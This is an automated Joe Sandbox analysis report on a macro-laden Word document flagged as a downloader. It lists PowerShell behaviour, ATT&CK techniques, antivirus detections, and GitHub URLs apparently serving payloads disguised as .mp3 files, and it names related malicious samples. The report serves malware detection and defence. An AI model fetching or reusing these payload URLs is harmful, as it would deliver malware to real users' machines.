Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsModify Registry1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
RfORrHIRNe.doc49%VirustotalBrowse
RfORrHIRNe.doc100%AviraHEUR/Macro.Agent
RfORrHIRNe.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP100%AviraHEUR/Macro.Downloader.MRQR.Gen
C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
raw.githubusercontent.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://github.co0%VirustotalBrowse
http://github.co0%Avira URL Cloudsafe
https://render.githubusercontent.com0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp30%Avira URL Cloudsafe
https://raw.githubuserco0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://notebooks.githubusercontent.com0%Avira URL Cloudsafe
https://raw.githubusercontent.com0%Avira URL Cloudsafe
https://viewscreen.githubusercontent.com0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
https://github.c0%Avira URL Cloudsafe
http://ocsp.entrust.net0D0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
github.com
140.82.121.3
truefalse
    high
    raw.githubusercontent.com
    185.199.108.133
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3false
    • Avira URL Cloud: safe
    unknown
    https://github.com/ssbb36/stv/raw/main/5.mp3false
      high
      http://github.com/ssbb36/stv/raw/main/5.mp3false
        high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://github.copowershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmptrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.windows.com/pctv.powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.compowershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpfalse
              high
              https://render.githubusercontent.compowershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/ssbb36/stv/rapowershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                high
                http://crl.entrust.net/server1.crl0powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                  high
                  http://github.com/ssbb36/stv/rawpowershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                    high
                    http://ocsp.entrust.net03powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.compowershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpfalse
                      high
                      https://github.com/ssbb36/stv/raw/main/1.mp3PEpowershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpfalse
                        high
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://github.com/ssbb36/stv/raw/main/4.mp3PEpowershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpfalse
                          high
                          http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://github.com/ssbb36/stv/raw/main/2.mp3powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                            high
                            https://github.com/ssbb3powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                              high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.hotmail.com/oepowershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpfalse
                                high
                                http://github.com/ssbb36/stv/raw/main/3.mp3powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                                  high
                                  https://raw.githubusercopowershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpfalse
                                    high
                                    http://github.compowershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmpfalse
                                      high
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.icra.org/vocabulary/.powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://notebooks.githubusercontent.compowershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmpfalse
                                        high
                                        http://github.com/ssbb36/stv/raw/main/2.mp3PEpowershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpfalse
                                          high
                                          https://raw.githubusercontent.compowershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://github.com/ssbb36powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmpfalse
                                            high
                                            http://github.com/ssbb36/stv/raw/main/4.mp3powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                                              high
                                              http://investor.msn.com/powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpfalse
                                                high
                                                https://viewscreen.githubusercontent.compowershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://github.com/ssbb36/stv/raw/main/5.mp3PEpowershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.%s.comPApowershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  low
                                                  https://github.cpowershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://github.com/ssbb36/stv/raw/main/3.mp3PEpowershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://ocsp.entrust.net0Dpowershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://github.com/ssbb36/stv/raw/main/1.mp3powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://secure.comodo.com/CPS0powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.piriform.com/ccleanerhttp://wTpowershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmpfalse
                                                            high

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            185.199.108.133
                                                            raw.githubusercontent.comNetherlands
                                                            54113FASTLYUSfalse
                                                            140.82.121.3
                                                            github.comUnited States
                                                            36459GITHUBUSfalse

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:515215
                                                            Start date:04.11.2021
                                                            Start time:01:48:56
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 6m 11s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:RfORrHIRNe (renamed file extension from none to doc)
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:4
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • GSI enabled (VBA)
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal88.expl.winDOC@3/10@3/2
                                                            EGA Information:Failed
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe
                                                            • Execution Graph export aborted for target powershell.exe, PID 2432 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            01:49:19API Interceptor42x Sleep call for process: powershell.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            185.199.108.1338p0O2OJPcE.exeGet hashmaliciousBrowse
                                                              Statement_125858.docGet hashmaliciousBrowse
                                                                MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                  zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                    ip ddos.exeGet hashmaliciousBrowse
                                                                      Ambrosial.exeGet hashmaliciousBrowse
                                                                        hwid.exeGet hashmaliciousBrowse
                                                                          fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                            AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                              Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                  gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                    YRbcV0B6TZ.exeGet hashmaliciousBrowse
                                                                                      KpDtm40Lne.exeGet hashmaliciousBrowse
                                                                                        6oi3E5jdTR.exeGet hashmaliciousBrowse
                                                                                          Software patch by Silensix.exeGet hashmaliciousBrowse
                                                                                            7D4B1B72B1318CB933E0D6420813499581064F57A713B.exeGet hashmaliciousBrowse
                                                                                              j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                mxZECDzIFz.exeGet hashmaliciousBrowse
                                                                                                  p3IJWYfJZw.exeGet hashmaliciousBrowse
                                                                                                    140.82.121.38p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                      zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                        Incoming_Wire_payment_returned120 ___vaw.jarGet hashmaliciousBrowse
                                                                                                          fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                            AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                              Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                                Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                                  pq9FtcL817.exeGet hashmaliciousBrowse
                                                                                                                    gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                                      KpDtm40Lne.exeGet hashmaliciousBrowse
                                                                                                                        6oi3E5jdTR.exeGet hashmaliciousBrowse
                                                                                                                          Software patch by Silensix.exeGet hashmaliciousBrowse
                                                                                                                            mxZECDzIFz.exeGet hashmaliciousBrowse
                                                                                                                              Contract and PI signed.jarGet hashmaliciousBrowse
                                                                                                                                Contract and PI signed .jarGet hashmaliciousBrowse
                                                                                                                                  p3IJWYfJZw.exeGet hashmaliciousBrowse
                                                                                                                                    Genshin Hack v2.0.exeGet hashmaliciousBrowse
                                                                                                                                      paket..jarGet hashmaliciousBrowse
                                                                                                                                        paket..jarGet hashmaliciousBrowse
                                                                                                                                          JwCS2tlN78.exeGet hashmaliciousBrowse

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            github.com8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            PO-011121.jarGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            iedRCXBuxs.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            hwid.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            Invoice Overdue_C0809-H03.xls.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            1S3cLXtFN2.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            RdCWJ3MAGz.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            INVOICE.jarGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            Md0q201V1D.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            plf5v18Xds.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Incoming_Wire_payment_returned120 ___vaw.jarGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            pq9FtcL817.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4

                                                                                                                                            ASN

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            GITHUBUS8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            PO-011121.jarGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            iedRCXBuxs.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            hwid.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            Invoice Overdue_C0809-H03.xls.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            RdCWJ3MAGz.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            INVOICE.jarGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            Md0q201V1D.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            Incoming_Wire_payment_returned120 ___vaw.jarGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            pq9FtcL817.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            YRbcV0B6TZ.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.4
                                                                                                                                            KpDtm40Lne.exeGet hashmaliciousBrowse
                                                                                                                                            • 140.82.121.3
                                                                                                                                            FASTLYUSNtxIAL7Vqi.dllGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.108
                                                                                                                                            SecuriteInfo.com.W64.Bzrloader.IEldorado.25041.dllGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.44
                                                                                                                                            #Ud83d#Udd0a VM 9193407283.wav.htmlGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.229
                                                                                                                                            8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            DELAY NOTICE - WAN HAI 261 S321 - SO 3110.exeGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.211
                                                                                                                                            Order_10112021 40200 p.m..htmlGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.229
                                                                                                                                            Oh49Bck5BV.exeGet hashmaliciousBrowse
                                                                                                                                            • 151.101.194.199
                                                                                                                                            Documents_photos.htmlGet hashmaliciousBrowse
                                                                                                                                            • 151.101.112.193
                                                                                                                                            nEVkwpjXlu.apkGet hashmaliciousBrowse
                                                                                                                                            • 151.101.2.137
                                                                                                                                            SOA OCT-NOV 2021.exeGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.211
                                                                                                                                            Statement_125858.docGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            cs.exeGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.164
                                                                                                                                            mipselGet hashmaliciousBrowse
                                                                                                                                            • 167.82.53.249
                                                                                                                                            6575DHL_6757.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.153
                                                                                                                                            PO-011121.jarGet hashmaliciousBrowse
                                                                                                                                            • 199.232.192.209
                                                                                                                                            iedRCXBuxs.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.199.110.133
                                                                                                                                            MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            dork.exeGet hashmaliciousBrowse
                                                                                                                                            • 151.101.1.44
                                                                                                                                            ip ddos.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            05af1f5ca1b87cc9cc9b25185115607dIMPORTS INVOICE.docGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Purchase Order NO_0184930.docGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            BL_DOCUMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Order-135078.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Bill_630781.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Purchase Order PO03112021STK.docxGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Payment 846725.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            inv-16731.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Purchase Order PO03112021STK.docxGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            INV 683068.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Payment-4091.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Bill.61566.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            inv-53639.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            INV.738108.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Order.48868.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            inv.030976.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            INV 362996.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Copy of Quote_ref-05550.xlsmGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            RFQ - 0211.docxGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3
                                                                                                                                            Bill-8593.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.199.108.133
                                                                                                                                            • 140.82.121.3

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11264
                                                                                                                                            Entropy (8bit):3.966590766878462
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Dzytv5uI73NUcen6nsQrBfqDf0C6PkKb1vC+X0jkbA6jwqgW6aajix2:DGtTryl6ke1N0jksS5a
                                                                                                                                            MD5:C8FF60850F690001E24A0F8E375A7758
